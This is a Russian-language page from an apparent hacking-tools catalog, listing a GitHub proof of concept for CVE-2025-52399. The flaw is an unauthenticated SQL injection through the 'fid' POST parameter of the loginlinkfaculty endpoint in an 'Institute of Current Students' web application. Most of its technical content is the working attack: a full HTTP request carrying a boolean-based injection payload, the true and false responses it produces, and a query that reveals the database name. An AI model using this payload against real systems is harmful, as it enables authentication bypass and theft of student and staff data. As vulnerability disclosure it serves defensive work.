Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students | Kitploit
Инструменты/GitHubGitHub/gmh5225/cve-2025-52399-sqli-institute-of-current-students
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubgmh5225/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

CVE-2025-52399 - SQL-инъекция в Institute of Current Students

Краткое описание

Эндпоинт loginlinkfaculty в приложении Institute-of-Current-Students подвержен SQL-инъекции через POST-параметр fid. Параметр не проходит должную очистку перед использованием в SQL-запросе, что позволяет удалённым злоумышленникам выполнять произвольные SQL-команды.

  • Тип уязвимости: SQL-инъекция
  • Затронутый компонент: /loginlinkfaculty (POST)
  • Затронутый параметр: fid
  • Аутентификация: не требуется
  • Воздействие: обход аутентификации, извлечение данных
  • Протестировано на: Localhost
  • База данных: icsnew
  • Версия: 1.0

PoC

HTTP-запрос

http POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+321=6+AND+000942=000942--&pass=example

Результат Payload

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → ИСТИНА ❌ -1' OR 2*3=4 AND 000942=000942 -- → ЛОЖЬ

Извлечение из базы данных

SELECT database(); -- returns 'icsnew'

Ссылки

  • CVE-2025-52399 (MITRE)
  • Уязвимое приложение
  • OWASP SQL-инъекция

Обнаружил

Isroil Mustafoqulov

Скачать инструмент